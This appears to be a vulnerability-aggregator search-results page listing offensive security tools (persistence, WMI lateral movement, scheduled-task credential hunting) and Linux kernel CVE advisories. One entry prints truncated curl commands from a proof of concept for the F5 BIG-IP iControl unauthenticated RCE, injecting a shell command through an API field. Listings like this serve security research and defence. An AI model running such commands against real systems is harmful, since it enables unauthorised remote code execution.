Lucene search
+L

1910 matches found

Kitploit
Kitploit
added 2026/09/13 12:30 p.m.35 views

hget

hget This project is my personal project to learn golang to build something useful. Build Status : Install root@kitploit: $ go get -d github.com/huydx/hget $ cd $GOPATH/src/github.com/huydx/hget $ make clean install Binary file will be built at ./bin/hget, you can copy to /usr/bin or /usr/local/b...

5.6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 11:18 a.m.10 views

90DaysOfCyberSecurity

90-Day Cybersecurity Study Plan 📚 Table of Contents Introduction Goals and Audience Daily Breakdown Day 1-7: Network+ Concepts Day 8-14: Security+ Concepts Day 15-28: Linux Tutorials Day 29-42: Python Day 43-56: Traffic Analysis Day 57-63: Git Day 64-70: ELK Day 71-77: GCP or AWS or Azure Day...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 5:41 a.m.190 views

ssh-audit

ssh-audit...

6.9AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/13 5:31 a.m.19 views

objection

📱objection - Runtime Mobile Exploration objection is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak. Supports both iOS and Android. Inspect and interact with container file systems...

5.8AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/13 2:47 a.m.12 views

TaskHound

Windows Privileged Scheduled Task Discovery Tool for fun and profit. TaskHound hunts for Windows scheduled tasks that run with privileged accounts and stored credentials. It enumerates tasks over SMB, parses XMLs, and identifies high-value attack opportunities through BloodHound integration. For...

6AI score
SaveExploits0References9
Kitploit
Kitploit
added 2026/09/13 1:42 a.m.7 views

SharpStay

SharpStay - .NET Persistence Building To compile open Visual Studio project and compile for release. Options Elevated Registry Keys Elevated UserInit Registry Key Elevated Scheduled Task Elevated Create Service Elevated WMI Event Subscription Non-Elevated InitMprLogonScript Registry Key...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/12 10:56 p.m.9 views

WMIExec

WMIexec Set of python scripts which perform different ways of command execution via WMI protocol. Blog Post https://whiteknightlabs.com/2023/06/26/navigating-stealthy-wmi-lateral-movement/ Usage wmiexecscheduledjob.py Is a python script which authenticates to a remote WMI instance and execute...

6.3AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/12 3:44 p.m.4 views

attack-attention

Attacking Attention of Foundation Models Effectively Disrupts Downstream Tasks Official PyTorch implementation of the paper "Attacking Attention of Foundation Models Effectively Disrupts Downstream Tasks" , accepted in the Adversarial Machine Learning on Computer Vision: Foundation Models + X ADV...

6AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/12 12:13 p.m.5 views

NorkNork

NorkNork - Tool for identifying Empire persistence payloads https://www.n00py.io/2017/01/removing-backdoors-powershell-empire-edition/ ABOUT: This script was designed to identify Powershell Empire persistence payloads on Windows systems. It currently supports checks for these persistence methods:...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/12 11:48 a.m.8 views

CVE-2021-22986-Poc

CVE-2021-22986-Poc Este es un PoC para BIGIP iControl RCE sin autenticación POC : curl -ksu admin:redacted https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '"filePath":"id"' | jq . curl -ksu : https://192.168.123.134/mgmt/shared/authn/login -d...

10CVSS8.4AI score0.99898EPSS
SaveExploits20
RedhatCVE
RedhatCVE
added 2026/09/11 9:04 p.m.4 views

CVE-2026-89464

A flaw was found in the Linux kernel's twl4030charger driver. When the driver's remove function is called, it fails to properly cancel pending worker tasks. This oversight allows a worker to attempt to access memory that has already been deallocated, leading to a use-after-free vulnerability. A...

4.4CVSS0.00168EPSS
SaveExploits0References7
NVD
NVD
added 2026/09/11 8:20 p.m.6 views

CVE-2026-89756

In the Linux kernel, the following vulnerability has been resolved: mm/migrate: report RCU-tasks quiescent states in migratepagesbatch migratepagesbatch unmaps each folio before moving it, and every unmap runs the mmunotifier invalidate callbacks. On KVM hosts trytomigrate ends up in...

0.00186EPSS
SaveExploits0References4
NVD
NVD
added 2026/09/11 8:20 p.m.6 views

CVE-2026-89753

In the Linux kernel, the following vulnerability has been resolved: mm/vmscan: report RCU-tasks quiescent states in shrinklruvec I am seeing some rcutasks stalls in the Meta fleet during reclaim. INFO: rcutasks detected stalls on tasks: 0000000088620d09: .. nvcsw: 6735/6735 holdout: 1 idlecpu: -1...

0.00168EPSS
SaveExploits0References4
CVE
CVE
added 2026/09/11 7:46 p.m.9 views

CVE-2026-89756

CVE-2026-89756 is a Linux kernel flaw in migrate_pages_batch() (mm/migrate). On PREEMPTION kernels, the loop's cond_resched() call is a no-op, and involuntary preemption does not constitute a Tasks-RCU quiescent state . When large page-migration batches run on KVM hosts , the expensive tdp_mmu_za...

0.00186EPSS
SaveExploits0References4
EUVD
EUVD
added 2026/09/11 7:46 p.m.5 views

EUVD-2026-76668

In the Linux kernel, the following vulnerability has been resolved: mm/migrate: report RCU-tasks quiescent states in migratepagesbatch migratepagesbatch unmaps each folio before moving it, and every unmap runs the mmunotifier invalidate callbacks. On KVM hosts trytomigrate ends up in...

0.00186EPSS
SaveExploits0References4
Cvelist
Cvelist
added 2026/09/11 7:46 p.m.27 views

CVE-2026-89756 mm/migrate: report RCU-tasks quiescent states in migrate_pages_batch()

In the Linux kernel, the following vulnerability has been resolved: mm/migrate: report RCU-tasks quiescent states in migratepagesbatch migratepagesbatch unmaps each folio before moving it, and every unmap runs the mmunotifier invalidate callbacks. On KVM hosts trytomigrate ends up in...

0.00186EPSS
SaveExploits0References4
OSV
OSV
added 2026/09/11 7:46 p.m.3 views

CVE-2026-89756 mm/migrate: report RCU-tasks quiescent states in migrate_pages_batch()

In the Linux kernel, the following vulnerability has been resolved: mm/migrate: report RCU-tasks quiescent states in migratepagesbatch migratepagesbatch unmaps each folio before moving it, and every unmap runs the mmunotifier invalidate callbacks. On KVM hosts trytomigrate ends up in...

5.8AI score
SaveExploits0References7
Cvelist
Cvelist
added 2026/09/11 7:46 p.m.27 views

CVE-2026-89753 mm/vmscan: report RCU-tasks quiescent states in shrink_lruvec()

In the Linux kernel, the following vulnerability has been resolved: mm/vmscan: report RCU-tasks quiescent states in shrinklruvec I am seeing some rcutasks stalls in the Meta fleet during reclaim. INFO: rcutasks detected stalls on tasks: 0000000088620d09: .. nvcsw: 6735/6735 holdout: 1 idlecpu: -1...

0.00168EPSS
SaveExploits0References4
CVE
CVE
added 2026/09/11 7:46 p.m.10 views

CVE-2026-89753

CVE-2026-89753 affects the Linux kernel in the memory management subsystem (mm/vmscan ). The root cause is that the scan loop in shrink_lruvec() only calls cond_resched(), which is a no-op on PREEMPTION kernels . Since involuntary preemption does not count as a Tasks-RCU quiescent state , a recla...

0.00168EPSS
SaveExploits0References4
OSV
OSV
added 2026/09/11 7:46 p.m.3 views

CVE-2026-89753 mm/vmscan: report RCU-tasks quiescent states in shrink_lruvec()

In the Linux kernel, the following vulnerability has been resolved: mm/vmscan: report RCU-tasks quiescent states in shrinklruvec I am seeing some rcutasks stalls in the Meta fleet during reclaim. INFO: rcutasks detected stalls on tasks: 0000000088620d09: .. nvcsw: 6735/6735 holdout: 1 idlecpu: -1...

5.9AI score
SaveExploits0References7
Rows per page
Query Builder